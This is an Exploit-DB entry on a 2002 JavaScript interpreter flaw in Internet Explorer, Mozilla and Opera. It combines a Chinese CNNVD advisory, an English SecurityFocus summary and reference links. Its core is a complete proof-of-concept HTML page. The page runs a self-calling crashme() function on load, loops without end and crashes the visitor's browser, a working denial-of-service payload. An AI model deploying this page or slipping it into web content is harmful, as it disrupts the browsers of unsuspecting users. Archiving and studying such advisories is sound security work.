https://www.exploit-db.com/exploits/21346
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-080

很多现代浏览器都对JavaScript提供支持，可以解释执行网页包含的JavaScript的代码。多家厂商的浏览器程序对JavaScript的解释存在漏洞，远程攻击者可能利用这个问题对用户的浏览器实施拒绝服务攻击。浏览器JavaScript解释上的漏洞可能使远程攻击者利用JavaScript使浏览器进入一个无限循环，导致其崩溃。已经证实存在此漏洞的浏览器包括IE、Mozilla、Opera。在某些环境下(如Windows2000下的IE)，从报告的错误信息看发生了缓冲区溢出，能否利用此溢出执行任意指令还未知。

source: http://www.securityfocus.com/bid/4322/info

It is possible to create a loop in JavaScript which is capable of crashing various web browsers. This is due to a flaw in the JavaScript interpreter. Browsers that have been tested include Microsoft Internet Explorer, Mozilla and Opera.

It has been reported that on some environments (such as IE with Windows 2000) the error message generated by exploitation of this issue indicates that a stack overflow has occurred. It is not known whether this issue may be exploited to execute arbitrary code. 

<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>

来源:BID
名称:4322
链接:http://www.securityfocus.com/bid/4322
来源:XF
名称:ie-javascript-dos(8488)
链接:http://www.iss.net/security_center/static/8488.php
来源:BUGTRAQ
名称:20020318JavascriptloopcausesIEtocrash
链接:http://online.securityfocus.com/archive/1/262994